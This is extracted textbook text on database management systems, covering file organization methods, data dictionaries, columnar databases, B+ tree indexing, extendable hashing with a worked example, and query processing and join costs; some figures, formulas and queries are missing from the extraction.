compute the address (find data block in memory) for this new record by applying the has
function on the certain columns of this record.
9.14 Data Storage
Advantages
• This method doesn’t require sorting explicitly as the records are automatically sorted in
the memory based on hash keys.
• Reading and fetching a record is faster compared to other methods as the hash key is
used to quickly read and retrieve the data from database.
• Records are not dependant on each other and are not stored in consecutive memory
locations so that prevents the database from read, write, update, delete anomalies.
Disadvantages
• Can cause accidental deletion of data, if columns are not selected properly for hash
function. For example, while deleting an Employee "Steve" using Employee_Name as
hash column can cause accidental deletion of other employee records if the other
employee name is also "Steve". This can be avoided by selecting the attributes properly,
for example in this case combining age, department or SSN with the employee_name
for hash key can be more accurate in finding the distinct record.
• Memory is not efficiently used in hash file organization as records are not stored in
consecutive memory locations.
• If there are more than one hash columns, searching a record using a single attribute will
not give accurate results.
Database Management Systems 9.15
Indexed sequential access method also known as ISAM method, is an upgrade to the
conventional sequential file organization method. You can say that it is an advanced version of
sequential file organization method. In this method, primary key of the record is stored with an
address as shown in Figure 9.9; this address is mapped to an address of a data block in memory.
This address field works as an index of the file.
In this method, reading and fetching a record is done using the index of the file. Index
field contains the address of a data record in memory, which can be quickly used to read and
fetch the record from memory.
Advantages
This method is more flexible compared to other methods as this allows to generate the index
field (address field) for any column of the record. This makes searching easier and efficient as
searches can be done using multiple column fields.
This allows range retrieval of the records since the address file is stored with the primary
key of the record; we can retrieve the record based on a certain range of primary key columns.
This method allows partial searches as well. For example, employee name starting with
“St” can be used to search all the employees with the name starting with letters “St”. This will
result all the records where employee name begins with the letters “St”.
9.16 Data Storage
Disadvantages
• After adding a record to the file, the file needs to be re-organized to maintain the
sequence based on primary key column.
• Requires memory cleanup because when a record is deleted, the space used by the record
needs to be released in order to be used by the other record.
• Performance issues are there if there is frequent deletion of records, as every deletion
needs a memory cleanup and optimization.
Cluster file organization is different from the other file organization methods. Other file
organization methods mainly focus on organizing the records in a single file (table). Cluster file
organization is used, when we frequently need combined data from multiple tables.
While other file organization methods organize tables separately and combine the result
based on the query, cluster file organization stores the combined data of two or more frequently
joined tables in the same file known as cluster as shown in Figure 9.10. This helps in accessing
the data faster.
The example that we have shown in the above diagram is an index based cluster file
organization. In this type, the cluster is formed based on the cluster key and this cluster key
works as an index of the cluster.
Since EMP_DEP field is common in both the tables, this becomes the cluster key when
these two tables joined to form the cluster. Whenever we need to find the combined record of
employees and department based on the EMP_DEP, this cluster can be used to quickly retrieve
the data.
This is same as index based cluster file organization except that in this type, the hash
function is applied on the cluster key to generate the hash value and that value is used in the
cluster instead of the index.
Note: The main difference between these two types is that in index based cluster, records are
stored with cluster key while in hash based cluster, and the records are stored with the hash
value of the cluster key.
Advantages
• This method is popularly used when multiple tables needs to be joined frequently based
on the same condition.
• When a table in database is joined with multiple tables of the same database then cluster
file organization method will be more efficient compared to other file organization
methods.
Disadvantages
• Not suitable for large databases: This method is not suitable if the size of the database
is huge as the performance of various operations on the data will be poor.
• Not flexible with joining condition: This method is not suitable if the join condition of
the tables keep changing, as it may take additional time to traverse the joined tables
again for the new condition.
9.18 Data Storage
• Isolated tables: If tables are not that related and there is rarely any join query on tables
then using this file organization is not recommended. This is because maintaining the
cluster for such tables will be useless when it is not used frequently.
Similar to ISAM file organization, B+ file organization also works with key & index
value of the records. It stores the records in a tree like structure that is why it is also known as
B+ Tree file organization. In B+ file organization, the leaf nodes store the records and
intermediate nodes only contain the pointer to the leaf nodes, these intermediate nodes do not
store any record.
Root node and intermediate nodes contain key field and index field. The key field is a
primary key of record which can be used to distinctly identify a record, the index field contains
the pointer (address) to the leaf node where the actual record is stored.
B+ Tree Representation
Let’s say we are storing the records of employees of an organization. These employee
records contain fields such as Employee_id, Employee_name, Employee_address etc. If we
consider Employee_id as primary key and the values of Employee_id ranges from 1001 to 1009
then the B+ tree representation can be as shown in Figure 9.11.
The important point to note here is that the records are only stored at the leaf nodes,
other records contain the key and index value (pointer to leaf node). Leaf Node 1001 means
that it stores the complete record of the employee where employee id is “1001”. Similarly, nodes
1002 stores the record of employee with employee id “1002” and so on. The main advantage of
B+ file organization is that searching a record is faster. This is because all the leaf nodes (where
the actual record is stored) are at the same distance from the root node and can be accessed
faster. Since intermediate nodes do not contain the records and only contains the pointer to the
leaf nodes, the height of the B+ tree is shorter that makes the traversing easier and faster.
Database Management Systems 9.19
Advantages
• Searching is faster: As we discussed earlier, since all the leaf nodes are at minimal
distance from the root node, searching a record is faster in B+ tree file organization.
• Flexible: Adding new records and removing old records can be easily done in a B+ tree
as the B+ tree is flexible in terms of size; it can grow and shrink based on the records
that needs to be stored. It has no restriction on the amount of the records that can be
stored.
• Allows range retrieval: It allows range retrieval. For example, if there is a requirement
to fetch all the records from a certain range, then it can be easily done using this file
organization method.
• Allows partial searches: Similar to ISAM, this also allows partial searches. For
example, we can search all the employees where id starts with “10“.
• Better performance: This file organization method gives better performance than other
file organization methods for insert, update, and delete operations.
Disadvantages
• This method is not suitable for static tables as it is not efficient for static tables compared
to other file organization methods.
Data dictionary is defined as a DBMS component that stores the definition of data
characteristics and relationships. It is simple ―data about data‖ as metadata. The DBMS data
dictionary provides the DBMS with its self-describing characteristic. In effect, the data
dictionary resembles and X-ray of the company’s entire data set, and is a crucial element in the
data administration function.
The two main types of data dictionary exist, integrated and stand alone.
1) An integrated data dictionary is included with the DBMS. For example, all relational
DBMSs include a built-in data dictionary or system catalog that is frequently accessed
and updated by the RDBMS.
9.20 Data Storage
2) Other DBMSs especially older types, do not have a built-in data dictionary instead the
DBA may use third-party stand-alone data dictionary systems
Data dictionaries can also be classified as active or passive. An active data dictionary is
automatically updated by the DBMS with every database access, thereby keeping its access
information up-to-date. A passive data dictionary is not updated automatically and usually
requires a batch process to be run. Data dictionary access information is normally used by the
DBMS for query optimization purpose.
The data dictionary’s main function is to store the description of all objects that interact
with the database. Integrated data dictionaries tend to limit their metadata to the data managed
by the DBMS. Stand-alone data dictionary systems are more usually more flexible and allow
the DBA to describe and manage all the organization’s data, whether or not they are
computerized. Whatever the data dictionary’s format, its existence provides database designers
and end users with a much improved ability to communicate. In addition, the data dictionary is
the tool that helps the DBA to resolve data conflicts. Although, there is no standard format for
the information stored in the data dictionary several features are common. For example, the data
dictionary typically stores descriptions of all:
• Data elements that are defined in all tables of all databases. Specifically, the data
dictionary stores the name, data types, display formats, internal storage formats, and
validation rules. The data dictionary tells where an element is used, by whom it is used
and so on.
• Tables defined in all databases. For example, the data dictionary is likely to store the
name of the table creator, the date of creation access authorizations, the number of
columns, and so on.
• Indexes defined for each database tables. For each index, the DBMS stores at least the
index names, the attributes used, the location, specific index characteristics and the
creation date.
• Define databases: who created each database, the date of creation where the database is
located, who the DBA is and so on.
• Programs that access the database including screen formats, report formats application
formats, SQL queries and so on.
• Relationships among data elements: which elements are involved, whether the
relationship is mandatory or optional, the connectivity and cardinality and so on.
If the data dictionary can be organized to include data external to the DBMS itself, it
becomes an especially flexible to for more general corporate resource management. The
management of such an extensive data dictionary, thus, makes it possible to manage the use and
allocation of all of the organization information regardless whether it has its roots in the
database data.
A column oriented store database is a type of database that stores data using a column
oriented model. It is responsible for speeding up the time required to return a particular query.
It also is responsible for greatly improving the disk I/O performance. It is helpful in data
analytics and data warehousing. Also, the major motive of Columnar Database is to effectively
read and write data. Here are some examples for Columnar Database like Monet DB, Apache
Cassandra, SAP Hana, Amazon Redshift.
Columns store databases use a concept called a keyspace. A keyspace is kind of like a
schema in the relational model. The keyspace contains all the column families (kind of like
tables in the relational model), which contain rows and columns as shown in Figure 9.12.
Let us take a closer look at a column family. Consider the Figure 9.13.
• Each row can contain a different number of columns to the other rows. And the columns
don’t have to match the columns in the other rows (i.e., they can have different column
names, data types, etc.).
• Each column is contained to its row. It doesn’t span all rows like in a relational database.
Each column contains a name/value pair, along with a timestamp. Note that this example
uses Unix/Epoch time for the timestamp.
Row Construction
The figure 9.14 shows the breakdown of each element in the row.
Database Management Systems 9.23
• Row Key. Each row has a unique key, which is a unique identifier for that row.
• Timestamp. This provides the date and time that the data was inserted. This can be
used to determine the most recent version of data.
• Columnar databases can be used for different tasks such as when the applications that
are related to big data comes into play then the column-oriented databases have greater
attention in such case.
• The data in the columnar database has a highly compressible nature and has different
operations like (AVG), (MIN, MAX), which are permitted by the compression.
• Efficiency and Speed: The speed of Analytical queries that are performed is faster in
columnar databases.
• For loading incremental data, traditional databases are more relevant as compared to
column-oriented databases.
• For Online transaction processing (OLTP) applications, Row oriented databases are
more appropriate than columnar databases.
CHAPTER – X
INDEXING AND HASHING
10.1. INTRODUCTION
An index for a file works like a catalogue in a library. Cards in alphabetic order tell us
where to find books by a particular author.
In real-world databases, indices like this might be too large to be efficient. We'll look at
more sophisticated indexing techniques. There are two kinds of indices.
• Hash indices: indices are based on the values being distributed uniformly across a range
of buckets. The bucket to which a value is assigned is determined by a function, called
a hash function.
We will consider several indexing techniques. No one technique is the best. Each
technique is best suited for a particular database application. Methods will be evaluated
based on:
• Access Types - types of access that are supported efficiently, e.g., value-based search or
range search.
• Insertion Time - time taken to insert a new data item (includes time to find the right
place to insert).
• Deletion Time - time to delete an item (includes time taken to find item, as well as to
update the index structure).
We may have more than one index or hash function for a file. (The library may have
card catalogues by author, subject or title.)
The attribute or set of attributes used to look up records in a file is called the search key
(not to be confused with primary key, etc.).
10.2 Indexing and Hashing
A good compromise is
• We are guaranteed to have the correct block with this method, unless record is on an
overflow block (actually could be several blocks).
Multi-Level Indices
1. Even with a sparse index, index size may still grow too large. For 100,000 records, 10
per block, at one index record per block, that's 10,000 index records. Even if we can fit
100 index records per block, this is 100 blocks.
2. If index is too large to be kept in main memory, a search results in several disk reads.
If there are no overflow blocks in the index, we can use binary search.
This will read as many as 1 + log2(b) blocks (as many as 7 for our 100 blocks).
If index has overflow blocks, then sequential search typically used, reading all b index
blocks.
The solution is to construct a sparse index on the index (Figure 10.4).
• Use binary search on outer index. Scan index block found until correct index record
found. Use index record as before - scan block pointed to for desired record.
• For very large files, additional levels of indexing may be required.
• Indices must be updated at all levels when insertions or deletions require it.
• Frequently, each level of index corresponds to a unit of physical storage (e.g.
indices at the level of track, cylinder and disk).
Updation
Regardless of what form of index is used, every index must be updated whenever a
record is either inserted into or deleted from the file.
Deletion
• If the last record with a particular search key value, delete that search key value from
index.
• For sparse indices, delete a key value by replacing key value's entry in index by next
search key value. If that value already has an index entry, delete the entry.
Insertion
• Sparse index: no change unless new block is created. (In this case, the first search key
value appearing in the new block is inserted into the index).
Secondary Indices
• If the search key of a secondary index is not a candidate key, it is not enough to point to
just the first record with each search-key value because the remaining records with the
same search-key value could be anywhere in the file. Therefore, a secondary index must
contain pointers to all the records.
• To perform a lookup on Peterson, we must read all three records pointed to by entries in
bucket2.
• Only one entry points to a Peterson record, but three records need to be read.
• As file is not ordered physically by cname, this may take 3 block accesses.
10.6 Indexing and Hashing
• Secondary indices must be dense, with an index entry for every search-key value, and a
pointer to every record in the file.
• They also impose serious overhead on database modification: whenever a file is updated,
every index must be updated.
Examples of secondary sparse indices are shown in Fig. 10.5 a) and Fig. 10.5 b).
Green
Lindsay Brighton 217 Green 750
Downtown 101 Johnson 500
Smith
Downtown 110 Peterson 600
Mianus 215 Smith 700
Perriridge 102 Hayes 400
Perriridge 201 Williams 900
Perriridge 218 Lyle 700
Redwood 222 Lindsay 700
Round Hill 305 Turner 350
1. B+ tree file structure maintains its efficiency despite frequent insertions and deletions.
It imposes some acceptable update and space overheads.
2. A B+ tree index is a balanced tree in which every path from the root to a leaf is of the
same length.
3. Each non leaf node in the tree must have between n/2 and n children, n-1 search keys
where n is fixed for a particular tree.
4. Special cases: if the root is not a leaf, it has at least 2 children. If the root is a leaf (that
is, there are no other nodes in the tree), it can have between 0 and (n − 1) values
1. A B+ tree index is a multilevel index but is structured differently from that of multi-level
index sequential files.
2. A typical node (Figure 10.6) contains up to n-1 search key values K1, K2, … Kn-1, and n
pointers P1, P2,,,,,,Pn. Search key values in a node are kept in sorted order.
3. For leaf nodes, Pi (i = 1,…,n-1) points to either a file record with search key value Ki,
or a bucket of pointers to records with that search key value. Bucket structure is used if
search key is not a primary key, and file is not sorted in search key order. Pointer Pn (nth
pointer in the leaf node) is used to chain leaf nodes together in linear order (search key
order). This allows efficient sequential processing of the file.
10.8 Indexing and Hashing
A non-leaf node may hold up to n pointers and must hold n/2 pointers. The number of
pointers in a node is called the fan-out of the node.
The following figures represents the B+ tree with n=3 and n=5.
function find(v)
1. C=root
Insertion and deletion are more complicated, as they may require splitting or combining
nodes to keep the tree balanced.
Find the leaf node in which the search-key value would appear
1. If there is room in the leaf node, insert the value in the leaf node
2. Otherwise, split the node, then insert and propagate updates to parent nodes.
2. If bucket is now empty, remove search key value from leaf node.
When insertion causes a leaf node to be too large, we split that node. Assume we wish
to insert a record with a value of “Clearview". There is no room for it in the leaf node
where it should appear. We now have n values (the n-1 search key values plus the new
one we wish to insert). We put the first n/2 values in the existing node, and the remainder
into a new node. The Figure 10.9 shows the B+ Tree before and after insertion of
“Clearview”.
10.10 Indexing and Hashing
The new node must be inserted into the B+ tree. We also need to update search key
values for the parent (or higher) nodes of the split leaf node (Except if the new node is
the leftmost one). Order must be preserved among the search key values in each node.
If the parent was already full, it will have to be split. When a non-leaf node is split, the
children are divided among the two new nodes. In the worst case, splits may be required
all the way up to the root. (If the root is split, the tree becomes one level deeper.)
Note: when we start a B+ tree, we begin with a single node that is both the root and a
single leaf. When it gets full and another insertion occurs, we split it into two leaf nodes,
requiring a new root.
Deleting records may cause tree nodes to contain too few pointers. Then we must
combine nodes. The result of deleting “Downtown" from the B+ tree of Fig 10.9 is
shown in Fig. 10.10.
In this case, the leaf node is empty and must be deleted. If we wish to delete “Perryridge"
from the B+ tree of Figure 10.9 the parent is left with only one pointer, and must be
coalesced with a sibling node. Sometimes higher-level nodes must also be coalesced. If
the root becomes empty as a result, the tree is one level less deep (Figure 10.11).
Sometimes the pointers must be redistributed to keep the tree balanced. Deleting
“Perryridge" from Figure 10.9 produces Figure 10.11.
1. The B+ tree structure is used not only as an index but also as an organizer for records
into a file.
2. In a B+ tree file organization, the leaf nodes of the tree store record instead of storing
pointers to records.
3. Since records are usually larger than pointers, the maximum number of records that can
be stored in a leaf node is less than the maximum number of pointers in a nonleaf node.
5. Insertion and deletion from a B+ tree file organization are handled in the same way as
that in a B+ tree index.
6. When a B+ tree is used for file organization, space utilization is particularly important.
We can improve the space utilization by involving more sibling nodes in redistribution
during splits and merges.
B tree indices are similar to B+ tree indices. The general structure of B tree is given in
Fig.10.12.
The Difference is that B tree eliminates the redundant storage of search key values. In
+
B tree of Fig 10.7, some search key values appear twice whereas B tree allows search key
values to appear only once as shown in Fig 10.13. Thus, we can store the index in less space.
The advantages of B-Trees do not out weigh its disadvantages. Generally, the structural
simplicity of B+ tree is preferred.
Database Management Systems 10.13
10.5 HASHING
The idea behind hashing is to provide a function h called a hash function or randomizing
function that is applied to the hash field value of a record and yields the address of the disk block
in which the record is stored. Hashing is typically implemented as a hash table through the use
of an array of records. Suppose that the array index range is from 0 to M-1 (Fig. 10.14) then we
have M slots whose addresses correspond to the array indexes. We choose a hash function that
transforms the hash field valve into an integer between 0 and M-1. One common hash function
is
which returns the remainder of the integer hash field value K after division by M; this
value is then used for the record address. Non-integer hash field values can be transformed into
integers before the mod function is applied. For character strings, the numeric (ASCII) codes
associated with character can be used in the transformation.
1. Static hashing – the hash function maps search key value to a fixed set of locations
2. Dynamic hashing – the hash table can grow to handle more items at run time.
10.14 Indexing and Hashing
A collision occurs when the hash field value of a record that is being inserted hashes to
an address that already contains a different record. in this situation, we must insert the new
record in some other position, since its hash address is occupied. The process of finding another
position is called collision resolution. The methods for collision resolution are as follows:
1. Open addressing: processing from the occupied position specified by the hash address,
the program checks the subsequent positions in order until an unused position is found.
2. Chaining: Various overflow locations are kept, usually by extending the array with a
number of overflow positions. A pointer field is added to each record location and setting
the pointer of the pointer of the occupied of the hash address location to the address of
that overflow location.
3. Multiple hashing: The program applies a second hash function if the first results in a
collision. If another collision results, the program uses open addressing or applies third
hash function and then uses open addressing if necessary.
Index schemes force us to traverse an index structure. Hashing avoids this kind of
unnecessary traversal.
Hashing involves computing the address of a data item by computing a function on the
search key value. A bucket is a unit of storage containing one or more entries (a bucket is
typically a disk block). A hash function h is a function from the set of all search key values K
to the set of all bucket addresses B as shown in Fig 10.15.
Database Management Systems 10.15
If two search keys i and j map to the same address, because h(Ki) = h(Kj), then the bucket
at the address obtained will contain records with both search key values. In this case we will
have to check the search key value of every record in the bucket to get the ones we want.
Insertion and deletion are simple.
Hash Functions
A good hash function gives an average-case lookup that is a small constant, independent
of the number of search keys. We hope records are distributed uniformly among the buckets.
The worst hash function maps all keys to the same bucket. The best hash function maps all keys
to distinct addresses. Ideally, distribution of keys to addresses is uniform and random.
Suppose we have 26 buckets, and map names beginning with ith letter of the alphabet
to the ith bucket.
Problem: This does not give uniform distribution. Many more names will be mapped to
“A" than to “X".
Typical hash functions perform some operation on the internal binary machine
representations of characters in a key. For example, compute the sum, modulo # of buckets, of
the binary representations of characters of the search key.
10.16 Indexing and Hashing
1. Open hashing occurs where records are stored in different buckets. Compute the hash
function and search the corresponding bucket to find a record.
2. Closed hashing occurs where all records are stored in one bucket. Hash function
computes addresses within that bucket. (Deletions are difficult.) Not used much in
database applications.
• If number is too large, we waste space. If number is too small, we get too many
“collisions", resulting in records of many search key values being in the same bucket.
Choosing the number to be twice the number of search key values in the file gives a
good space/performance tradeoff.
Hash Indices
1. A hash index organizes the search keys with their associated pointers into a hash file
structure.
2. We apply a hash function on a search key to identify a bucket, and store the key and its
associated pointers in the bucket (or in overflow buckets).
3. Strictly speaking, hash indices are only secondary index structures, since if a file itself
is organized using hashing, there is no need for a separate hash index structure on it.
• Choose hash function based on current file size. Get performance degradation as
file grows.
• Choose hash function based on anticipated file size. Space is wasted initially.
• Periodically re-organize hash structure as file grows. Requires selecting new hash
function, recomputing all addresses and generating new bucket assignments.
Costly, and shuts down database.
Database Management Systems 10.17
Extendable hashing is one form of dynamic hashing. Extendable hashing splits and
coalesces buckets as database size changes. This imposes some performance overhead,
but space efficiency is maintained. As reorganization is on one bucket at a time,
overhead is acceptably low.
Figure 10.16 shows an extendable hash structure. Note that the i appearing over the
bucket address table tells how many bits are required to determine the correct bucket. It
may be the case that several entries point to the same bucket. All such entries will have
a common hash pre x, but the length of this pre x may be less than i.
So, we give each bucket an integer giving the length of the common hash pre x. This is
shown in Figure 10.16 as ij. Number of bucket entries pointing to bucket j is then
2(i-ij ).
Compute h(Kl).
If there is room in the bucket, insert information and insert record in the file.
If the bucket is full, we must split the bucket, and redistribute the records.
If bucket is split we may need to increase the number of bits we use in the hash.
1. If i = ij, then only one entry in the bucket address table points to bucket j.
Then we need to increase the size of the bucket address table so that we can include
pointers to the two buckets that result from splitting bucket j.
We increment i by one, thus considering more of the hash, and doubling the size of
the bucket address table.
Set ij and iz to i.
It is remotely possible, but unlikely, that the new hash will still put all of the records
in one bucket. If so, split again and increment i again.
2. If i > ij, then more than one entry in the bucket address table points to bucket j.
Then we can split bucket j without increasing the size of the bucket address table.
Note that all entries that point to bucket j correspond to hash prefixes that have the
same value on the leftmost ij bits.
We allocate a new bucket z, and set ij and iz to the original ij value plus 1.
Now adjust entries in the bucket address table that previously pointed to bucket j.
Leave the first half pointing to bucket j, and make the rest point to bucket z.
Database Management Systems 10.19
The Deletion of records is similar. Buckets may have to be coalesced, and bucket
address table may have to be halved.
Hash Function: Suppose the global depth is X. Then the Hash Function returns X LSBs.
Solution: First, calculate the binary forms of each of the given numbers.
16- 10000
4- 00100
6- 00110
22- 10110
24- 11000
10- 01010
31- 11111
7- 00111
9- 01001
20- 10100
26- 11010
Initially, the global-depth and local-depth is always 1. Thus, the hashing frame looks like this:
10.20 Indexing and Hashing
Inserting 16:
The binary format of 16 is 10000 and global-depth is 1. The hash function returns 1 LSB of
10000 which is 0. Hence, 16 is mapped to the directory with id=0.
Inserting 4 and 6:
Both 4(100) and 6(110) have 0 in their LSB. Hence, they are hashed as follows:
Inserting 22: The binary form of 22 is 10110. Its LSB is 0. The bucket pointed by directory 0 is
already full. Hence, Over Flow occurs.
Since Local Depth = Global Depth, the bucket splits and directory expansion takes
place. Also, rehashing of numbers present in the overflowing bucket takes place after the split.
And, since the global depth is incremented by 1, now,the global depth is 2. Hence, 16,4,6,22
are now rehashed w.r.t 2 LSBs.[ 16(10000),4(100),6(110),22(10110) ]
Database Management Systems 10.21
Note: The bucket which was underflow has remained untouched. But, since the number
of directories has doubled, we now have 2 directories 01 and 11 pointing to the same bucket.
This is because the local-depth of the bucket has remained 1. And, any bucket having a local
depth less than the global depth is pointed-to by more than one directory.
Inserting 24 and 10: 24(11000) and 10 (1010) can be hashed based on directories with
id 00 and 10. Here, we encounter no overflow condition.
Inserting 31,7,9: All of these elements[ 31(11111), 7(111), 9(1001) ] have either 01 or
11 in their LSBs. Hence, they are mapped on the bucket pointed out by 01 and 11. We do not
encounter any overflow condition here.
10.22 Indexing and Hashing
Inserting 20: Insertion of data element 20 (10100) will again cause the overflow
problem. since the local depth of the bucket = global-depth, directory expansion (doubling)
takes place along with bucket splitting. Elements present in overflowing bucket are rehashed
with the new global depth. Now, the new Hash table looks like this:
Inserting 26: Global depth is 3. Hence, 3 LSBs of 26(11010) are considered. Therefore
26 best fits in the bucket pointed out by directory 010.
since the local depth of bucket < Global depth (2<3), directories are not doubled but,
only the bucket is split and elements are rehashed.
Advantages
• Extendable hashing provides performance that does not degrade as the file grows.
• Minimal space overhead - no buckets need be reserved for future use. Bucket address
table only contains one pointer for each hash value of current pre x length.
Disadvantages:
• Added complexity
1. To make a wise choice between the methods seen, database designer must consider the
following issues:
2. The last issue is critical to the choice between indexing and hashing. If most queries are
of the form select A1, A2,…., An from r where Ai = c, then to process this query the
10.24 Indexing and Hashing
system will perform a lookup on an index or hash structure for attribute Ai with value
c.
Index lookup takes time proportional to log of number of values in R for Ai.
Hash structure provides lookup average time that is a small constant (independent of
database size).
Hash worst-case gives time proportional to the number of values in R for Ai.
5. Index methods are preferable where a range of values is specified in the query, e.g. select
A1, A2,… An from r where Ai c2 and Ai c1. This query finds records with Ai values
in the range from c1 to c2.
6. Using an index structure, we can find the bucket for value c1, and then follow the pointer
chain to read the next buckets in alphabetic (or numeric) order until we find c2.
If we have a hash structure instead of an index, we can find a bucket for c1 easily, but
it is not easy to find the “next bucket".
Also, each bucket may be assigned many search key values, so we cannot chain them
together.
To support range queries using a hash structure, we need a hash function that preserves
order.
For example, if K1 and K2 are search key values and K1 < K2 then h(K1) < h(K2).
Order-preserving hash functions that also provide randomness and uniformity are
extremely difficult to find.
Thus, most systems use indexing in preference to hashing unless it is known in advance
that range queries will be infrequent.
CHAPTER – XI
QUERY PROCESSING AND
OPTIMIZATION
Query Processing is the activity performed in extracting data from the database. The
steps involved are:
2. Optimization
3. Evaluation
Before query processing can begin, the system must translate the query into a usable
form. A language such as SQL is suitable for human use, but is ill suited to be the system’s
internal representation of a query. A more useful internal representation is one based on the
extended relational algebra.
Thus, the first action the system must take in query processing is to translate a given
query into its internal form. This translation process is similar to the work performed by the
parser of a compiler. In generating the internal form of the query, the parser checks the syntax
of the user’s query, verifies that the relation names appearing in the query are names of the
relations in the database, and so on. The system constructs a parse-tree representation of the
query, which it then translates into a relational-algebra expression. If the query was expressed
in terms of a view, the translation phase also replaces all uses of the view by the relational-
algebra expression that defines the view.
Suppose a user executes a query to fetch the records of the employees whose salary is
less than 75000. For doing this, the query is:
Thus, to make the system understand the user query, it needs to be translated in the form
of relational algebra. We can bring this query in the relational algebra form as:
After translating the given query, we can execute each relational algebra operation by
using different algorithms.
Optimization
The different evaluation plans for a given query can have different costs. We do not
expect users to write their queries in a way that suggests the most efficient evaluation plan.
Rather, it is the responsibility of the system to construct a query evaluation plan that minimizes
the cost of query evaluation; this task is called query optimization
In order to optimize a query, a query optimizer must know the cost of each operation.
Although the exact cost is hard to compute, since it depends on many parameters such as actual
memory available to the operation, it is possible to get a rough estimate of execution cost for
each operation. Usually, a database system generates an efficient query evaluation plan, which
Database Management Systems 11.3
minimizes its cost. This type of task performed by the database system and is known as Query
Optimization.
The cost of the query evaluation can vary for different types of queries. For optimizing
a query, the query optimizer should have an estimated cost analysis of each operation. It is
because the overall operation cost depends on the memory allocations to several operations,
execution costs, and so on.
Evaluation
For this, with addition to the relational algebra translation, it is required to annotate the
translated relational algebra expression with the instructions used for specifying and evaluating
each operation.
• A query execution engine is responsible for generating the output of the given query. It
takes the query execution plan, executes it, and finally makes the output for the user
query.
Finally, after selecting an evaluation plan, the system evaluates the query and produces
the output of the query.
Estimating the cost of a query plan should be done by measuring the total resource
consumption. Generally, the selection operation is performed by the file scan. File scans are the
search algorithms that are used for locating and accessing the data. It is the lowest-level operator
used in query processing.
11.4 Query Processing and Optimization
In RDBMS or relational database systems, the file scan reads a relation only if the whole
relation is stored in one file only. When the selection operation is performed on a relation whose
tuples are stored in one file, it uses the following algorithms:
• Linear Search: In a linear search, the system scans each record to test whether satisfying
the given selection condition. For accessing the first block of a file, it needs an initial
seek. If the blocks in the file are not stored in contiguous order, then it needs some extra
seeks. However, linear search is the slowest algorithm used for searching, but it is
applicable in all types of cases. This algorithm does not care about the nature of
selection, availability of indices, or the file sequence. But other algorithms are not
applicable in all types of cases.
The index-based search algorithms are known as Index scans. Such index structures are
known as access paths. These paths allow locating and accessing the data in the file. There are
following algorithms that use the index in query processing:
We use the index to retrieve a single record that satisfies the equality condition for
making the selection. The equality comparison is performed on the key attribute carrying a
primary key.
The difference between equality on key and nonkey is that in this, we can fetch multiple
records. We can fetch multiple records through a primary key when the selection criteria specify
the equality comparison on a nonkey.
The selection that specifies an equality condition can use the secondary index. Using
secondary index strategy, we can either retrieve a single record when equality is on key or
multiple records when the equality condition is on nonkey. When retrieving a single record, the
time cost is equal to the primary index. In the case of multiple records, they may reside on
different blocks. This results in one I/O operation per fetched record, and each I/O operation
requires a seek and a block transfer.
Database Management Systems 11.5
For making any selection on the basis of a comparison in a relation, we can proceed it
either by using the linear search or via indices in the following ways:
When the selection condition given by the user is a comparison, then we use a primary
ordered index, such as the primary B+-tree index. For example, when A attribute of a relation
R compared with a given value v as A>v, then we use a primary index on A to directly retrieve
the tuples. The file scan starts its search from the beginning till the end and outputs all those
tuples that satisfy the given selection condition.
The secondary ordered index is used for satisfying the selection operation that involves
<, >, ≤, or ≥ In this, the files scan searches the blocks of the lowest-level index.
(< ≤): In this case, it scans from the smallest value up to the given value v.
(>, ≥): In this case, it scans from the given value v up to the maximum value.
However, the use of the secondary index should be limited for selecting a few records.
It is because such an index provides pointers to point each record, so users can easily fetch the
record through the allocated pointers. Such retrieved records may require an I/O operation as
records may be stored on different blocks of the file. So, if the number of fetched records is
large, it becomes expensive with the secondary index.
Conjunction:
A conjunctive selection is the selection having the form as: σ θ1ꓥθ2ꓥ…ꓥθn (r)
A conjunction is the intersection of all records that satisfies the above selection condition.
Disjunction:
A disjunctive selection is the selection having the form as: σ θ1ꓦθ2ꓦ…ꓦθn (r)
A disjunction is the union of all records that satisfies the given selection condition θi.
11.6 Query Processing and Optimization
Negation:
The result of a selection σ¬θ(r) is the set of tuples of given relation r where the selection
condition evaluates to false. But nulls are not present, and this set is only the set of tuples in
relation r that are not in σθ(r).
A composite index is the one that is provided on multiple attributes. Such an index may
be present for some conjunctive selections. If the given selection operation proves true on the
equality condition on two or more attributes and a composite index is present on these combined
attribute fields, then directly search the index. Such type of index evaluates the suitable index
algorithms.
This implementation involves record pointers or record identifiers. It uses indices with
the record pointers on those fields which are involved in the individual selection condition. It
scans each index for pointers to tuples satisfying the individual condition. Therefore, the
intersection of all the retrieved pointers is the set of pointers to the tuples that satisfies the
conjunctive condition. The algorithm uses these pointers to fetch the actual records. However,
in absence of indices on each individual condition, it tests the retrieved records for the other
remaining conditions.
This algorithm scans those entire indexes for pointers to tuples that satisfy the individual
condition. But only if access paths are available on all disjunctive selection conditions.
Therefore, the union of all fetched records provides pointers sets to all those tuples which satisfy
or prove the disjunctive condition. Further, it makes use of pointers for fetching the actual
records. Somehow, if the access path is not present for anyone condition, we need to use a linear
search to find those tuples that satisfy the condition. Thus, it is good to use a linear search for
determining such tests.
Database Management Systems 11.7
where A and B are attributes or sets of attributes of relations r and s, respectively. We use the
following in our examples:
It is used to compute the theta join, of two relations r and s. This algorithm is called the
nested-loop join algorithm, since it basically consists of a pair of nested for loops. Relation r is
called the outer relation and relation s the inner relation of the join. tr · ts denotes the tuple
constructed by concatenating the attribute values of tuples tr and ts . In the worst case, the buffer
can hold only one block of each relation, and a total of nr ∗ bs + br block transfers.
• In the worst case, the number of block transfers is 5000 ∗ 400+100 = 2,000,100, plus
5000+100 = 5100 seeks.
• The worst-case cost of our final strategy would have been 10,000 ∗ 100 + 400 =
1,000,400 block transfers, plus 10,400 disk seeks.
Within each pair of blocks, every tuple in one block is paired with every tuple in the
other block, to generate all pairs of tuples. All pairs of tuples that satisfy the join condition are
added to the result. The primary difference in cost between the block nested-loop join and the
basic nested-loop join is that. In the worst case, each block in the inner relation s is read only
once for each block in the outer relation, instead of once for each tuple in the outer relation. In
11.8 Query Processing and Optimization
the worst case, there will be a total of br ∗ bs + br block transfers, where br and bs denote the
number of blocks containing records of r and s, respectively.
• In the worst case, a total of 100 ∗ 400+100 =40,100 block transfers plus 2∗100 = 200
seeks are required.
• The performance of the nested-loop and block nested-loop procedures can be further
improved as follows:
1. If the join attributes in a natural join or an equi-join form a key on the inner relation,
then for each outer relation tuple the inner loop can terminate as soon as the first match
is found.
2. Use the biggest size that can fit in memory, while leaving enough space for the buffers
of the inner relation and the output.
3. Scan the inner loop alternately forward and backward and thus reducing the number of
disk accesses needed.
